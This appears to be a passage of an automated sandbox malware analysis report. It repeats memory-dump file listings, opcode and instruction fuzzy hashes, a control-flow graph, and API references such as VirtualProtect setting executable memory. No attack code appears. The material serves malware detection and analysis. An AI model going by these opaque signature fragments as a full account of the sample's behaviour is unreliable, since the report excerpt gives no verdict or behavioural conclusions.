                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitProcess
                      • String ID:
                      • API String ID: 621844428-0
                      • Opcode ID: 8a0ea8293272a5dce6b18dde29f5876ea0fd1f41c4ae5e383ca135e33276650e
                      • Instruction ID: 41c0bda98abb6affdce0bfdaad6be249c0a48bc92da71cafe1fd5a24dbf5fdb0
                      • Opcode Fuzzy Hash: 8a0ea8293272a5dce6b18dde29f5876ea0fd1f41c4ae5e383ca135e33276650e
                      • Instruction Fuzzy Hash: 1B9179B4E09228CFEB25CB14CC90BEAB776BF84305F1481EAC84D67251D6396ED6CE45

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 548 41fccf-41fd34 549 41fd45-41fd90 548->549 550 41fd36-41fd40 548->550 557 41fda1-41fda7 549->557 558 41fd92-41fd9c 549->558 551 420001-420091 550->551 555 420093-42009f 551->555 556 4200a4-4200b9 551->556 559 420395-4203a3 ExitProcess 555->559 560 4200bb-4200c7 556->560 561 4200cc-4200eb 556->561 562 41fdad-41fe05 557->562 558->551 560->559 564 4200fe-420110 561->564 565 4200ed-4200f9 561->565 566 41fe0c-41fed3 call 41fea9 562->566 567 420112-42011e 564->567 568 420123-42018c 564->568 565->559 578 41fed5-41feeb 566->578 579 41feed-41fefd 566->579 567->559 572 420192-4201dc 568->572 573 420389-42038f 568->573 575 4201de-4201e7 572->575 576 4201ed-4201fe 572->576 573->559 575->576 580 420204-420214 576->580 581 42029f-4202b1 call 4202b2 576->581 582 41ff50-41ff57 578->582 579->566 584 41ff03-41ff16 579->584 580->581 583 42021a-42026b call 42022a 580->583 586 41ff99-41ffe5 call 41ffb3 582->586 587 41ff59-41ff97 582->587 599 420291 583->599 600 42026d-42028f 583->600 584->566 589 41ff1c-41ff2c 584->589 601 41fff7 586->601 602 41ffe7-41fff1 586->602 587->551 593 41ff3a 589->593 594 41ff2e-41ff38 589->594 597 41ff44-41ff4a 593->597 594->597 597->582 599->575 600->599 603 420298 600->603 601->551 602->562 602->601 603->581
                      APIs
                      • ExitProcess.KERNEL32(00000000), ref: 004203A3
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitProcess
                      • String ID:
                      • API String ID: 621844428-0
                      • Opcode ID: b391bec8c69c6ea0c80c362058d44944aa2b1426c5d4457fbb903709eddb4fc6
                      • Instruction ID: 22430cc608b4b46f28f225414a516fc4dcb0ea27b6d590589a9f11856cb9d482
                      • Opcode Fuzzy Hash: b391bec8c69c6ea0c80c362058d44944aa2b1426c5d4457fbb903709eddb4fc6
                      • Instruction Fuzzy Hash: 8E71AFF6D101259FE7248B10EC44BFAB7B5EB88310F1081FAD90EA6741E6785EC68E55
                      APIs
                      • ExitProcess.KERNEL32(00000000), ref: 004203A3
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitProcess
                      • String ID:
                      • API String ID: 621844428-0
                      • Opcode ID: c24bf6d99de0f2a3c11adbcb63d99e7db27727c7d3cd9f5913e1953949dac405
                      • Instruction ID: 468ef1287cf3862ee6a732311484bf04ea925a2ccc64149078e9a72c15c0f2ec
                      • Opcode Fuzzy Hash: c24bf6d99de0f2a3c11adbcb63d99e7db27727c7d3cd9f5913e1953949dac405
                      • Instruction Fuzzy Hash: F661BDF1D102298BEB248B10DC847FAB3B5FB84311F1081EAE90DA6281E7785EC6CF55
                      APIs
                      • VirtualProtect.KERNELBASE(?,?,00000040,FFFFEBA4,?,?,?,?,?,?,?,?,00406A5A,?), ref: 0040779F
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID:
                      • API String ID: 544645111-0
                      • Opcode ID: e85c90ef5863dd61c7a654771148e6924bd2c10f9f9041b8bfcfa50669615557
                      • Instruction ID: 998609d879f4d36cde1debd14f82a78290edc987e1c20507e84fc6d065adc7b9
                      • Opcode Fuzzy Hash: e85c90ef5863dd61c7a654771148e6924bd2c10f9f9041b8bfcfa50669615557
                      • Instruction Fuzzy Hash: 9A31F6B2D082545BF7188B11DC59AEB7B78EB81310F1441FFD90E67280D63D6AC6CE52
                      APIs
                      • VirtualProtect.KERNELBASE(?,?,00000040,FFFFEBA4,?,?,?,?,?,?,?,?,00406A5A,?), ref: 0040779F
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID:
                      • API String ID: 544645111-0
                      • Opcode ID: 9c2b22a18ebb58a2560ddd336db8cb0d0dfd2afaa7fc5d569bcc842e142561c6
                      • Instruction ID: 932dec28702412b53e9c094fda6d120bcd460c0735ecd7e166b51138a84fedff
                      • Opcode Fuzzy Hash: 9c2b22a18ebb58a2560ddd336db8cb0d0dfd2afaa7fc5d569bcc842e142561c6
                      • Instruction Fuzzy Hash: 0121F0B1E086949BE7248B24ED90AEAB774FF85340F1442FBD509672C1D6392A82CF47
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID:
                      • API String ID: 544645111-0
                      • Opcode ID: 91cad57a516e2f4c361eacc58a156d573613a8a0f31843566538594da25e37eb
                      • Instruction ID: b91199c152535c76d48c2b5e435d673f220464ab319cc39e82abbb88fa2171cb
                      • Opcode Fuzzy Hash: 91cad57a516e2f4c361eacc58a156d573613a8a0f31843566538594da25e37eb
                      • Instruction Fuzzy Hash: 5921ACB2D1C5609BE3144B65DC48AEB7B78EF41340F0002FBD9095B083C2396A86CF93
                      APIs
                      • ExitProcess.KERNEL32(00000000), ref: 004203A3
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitProcess
                      • String ID:
                      • API String ID: 621844428-0
                      • Opcode ID: ab4ead3101172d02aac48522461da7bc08d1452eec5aebfae6fa96207dd12a1a
                      • Instruction ID: 5bc159319ebb743867fb39de3f8c748a28a03fbd673abd2d44e4042212212909
                      • Opcode Fuzzy Hash: ab4ead3101172d02aac48522461da7bc08d1452eec5aebfae6fa96207dd12a1a
                      • Instruction Fuzzy Hash: CC115CF3E041485BF3105624DD45AFF7738DBC1314F1881BBE84986540E5BC9ACB8A97
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID:
                      • API String ID: 544645111-0
                      • Opcode ID: f6bc614bc64cf056d1a09f5f2bfde908a2a7db6986d7a22e2c0509103412b2f7
                      • Instruction ID: 3c0158fd909a129efc1a5eb41b99e6176bf6047d08ad53226ee2bae0628576df
                      • Opcode Fuzzy Hash: f6bc614bc64cf056d1a09f5f2bfde908a2a7db6986d7a22e2c0509103412b2f7
                      • Instruction Fuzzy Hash: B51176B3E081A05BE3104765EC48EE7BB38EB81310F0442FBD90D67181D6396EC68B93
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID:
                      • API String ID: 544645111-0
                      • Opcode ID: 5731e0e6edc125a2e43a085edf6b776cfc2c4dacd2189dfd6081b11495611bc1
                      • Instruction ID: 9a8444cee67629d71a130239ee861f54f37e657be2337cb6b038551eb8c7450a
                      • Opcode Fuzzy Hash: 5731e0e6edc125a2e43a085edf6b776cfc2c4dacd2189dfd6081b11495611bc1
                      • Instruction Fuzzy Hash: 68114CB2E086405BF3148B21ED55EE77778FB81350F1482FFD50957181D6396A86CB53
                      APIs
                      • ExitProcess.KERNEL32(00000000), ref: 004203A3
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitProcess
                      • String ID:
                      • API String ID: 621844428-0
                      • Opcode ID: 72de2b23a5a7004e1340f99e268a21924275a9173d8350a07b602b65527988a2
                      • Instruction ID: e29210356c8ac607a074c4d3a0003b51328783218ad205ebd55b70756ab56305
                      • Opcode Fuzzy Hash: 72de2b23a5a7004e1340f99e268a21924275a9173d8350a07b602b65527988a2
                      • Instruction Fuzzy Hash: 5611B4B1E041658BDB24CA14EC947EE7AF5BB80300F6402EAC85E56286C7BC1FC18F46
                      APIs
                      • VirtualProtect.KERNELBASE(?,?,00000040,FFFFEBA4,?,?,?,?,?,?,?,?,00406A5A,?), ref: 0040779F
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: ProtectVirtual
                      • String ID:
                      • API String ID: 544645111-0
                      • Opcode ID: d53b0c6e95c7fd54e9a925cc6874bffe05f596334bc776d4928f5b1e923c50d3
                      • Instruction ID: 8855314161c604dab32c9539a428904a4b839c8b04b57f9093ab9272a71fba34
                      • Opcode Fuzzy Hash: d53b0c6e95c7fd54e9a925cc6874bffe05f596334bc776d4928f5b1e923c50d3
                      • Instruction Fuzzy Hash: 8C0149B1E041806BE3248B61DD54EEBBB7CEF80340F0441FFE20957081C635AA86CF52
                      APIs
                        • Part of subcall function 00592B09: EnterCriticalSection.KERNEL32(0060F61C,?,?,?,00525158,00616078,?,00000000,005A9CE1,000000FF,?,0042319D), ref: 00592B14
                        • Part of subcall function 00592B09: LeaveCriticalSection.KERNEL32(0060F61C,?,00525158,00616078,?,00000000,005A9CE1,000000FF,?,0042319D), ref: 00592B51
                      • __Init_thread_footer.LIBCMT ref: 0052DB0B
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: CriticalSection$EnterInit_thread_footerLeave
                      • String ID:
                      • API String ID: 3960375172-0
                      • Opcode ID: ab4d270cbbb53534f8c92a4f8be60fff7eba6527090ddf4d4e5d3127723f146c
                      • Instruction ID: 5d6fafc3de38fa83bbede26ecfe44ae733c6c434a7af38891c4b54fb711eb241
                      • Opcode Fuzzy Hash: ab4d270cbbb53534f8c92a4f8be60fff7eba6527090ddf4d4e5d3127723f146c
                      • Instruction Fuzzy Hash: 857109715009714BD70CCE28E8726F57BA2BB86301F4E827FEB5386AD1C679E652CB50
                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0059301F
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.00000000006A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_5_2_400000_build.jbxd
                      Yara matches
                      Similarity
                      • API ID: FeaturePresentProcessor
                      • String ID:
                      • API String ID: 2325560087-0
                      • Opcode ID: dedb4b6ba5bd9499249da44ea6a8597d948c84de17c93b5f33b2e2852dcf6df9
                      • Instruction ID: 7bb6667c9af65f534ab51a75e90a60d57ffd640f6537029fd7c0a6b1cddf6e49
                      • Opcode Fuzzy Hash: dedb4b6ba5bd9499249da44ea6a8597d948c84de17c93b5f33b2e2852dcf6df9
                      • Instruction Fuzzy Hash: A561D471A40609DFDF24CF54D9857AEBFF5FB04310F14852AE816EB2A0D775AA40CB90
                      Memory Dump Source
                      • Source File: 00000005.00000002.2032723001.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000005.00000002.2032693604.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033114095.0000000000606000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033150526.0000000000607000.00000008.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033183149.000000000060F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.0000000000617000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000061D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033211663.000000000062E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmpDownload File
                      • Associated: 00000005.00000002.2033391117.0000000000699000.00000002.00000001.01000000.0000000B.sdmpDownload File
